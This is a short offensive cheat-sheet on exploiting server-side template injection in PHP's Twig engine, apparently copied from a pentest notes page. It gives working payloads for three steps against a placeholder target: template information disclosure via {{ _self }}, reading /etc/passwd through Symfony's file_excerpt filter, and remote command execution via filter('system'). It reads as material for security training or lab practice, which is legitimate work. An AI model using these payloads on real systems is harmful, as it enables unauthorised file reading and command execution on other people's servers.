Exploiting SSTI - Twig

Exploitation Techniques

1. Understanding Twig:

   • Twig is a template engine used in PHP applications.

   • It allows for dynamic content generation but can also be exploited if vulnerabilities are present.

2. Information Disclosure:

   • Obtain Template Information:

     • Use the following payload to get basic information about the current template:

       Copy

       {{ _self }}

     • Access the application at:

       Copy

       http://<SERVER_IP>:<PORT>/

     • Note: The information obtained is limited compared to other template engines like Jinja.

3. Local File Inclusion (LFI):

   • Read Local Files:

     • While Twig does not directly support reading local files, you can use the file_excerpt filter provided by the Symfony framework:

       Copy

       {{ "/etc/passwd"|file_excerpt(1,-1) }}

     • Access the application at:

       Copy

       http://<SERVER_IP>:<PORT>/

4. Remote Code Execution (RCE):

   • Execute Commands:

     • To achieve remote code execution, you can use PHP's built-in system function with Twig's filter functionality:

       Copy

       {{ ['id'] | filter('system') }}

     • Access the application at:

       Copy

       http://<SERVER_IP>:<PORT>/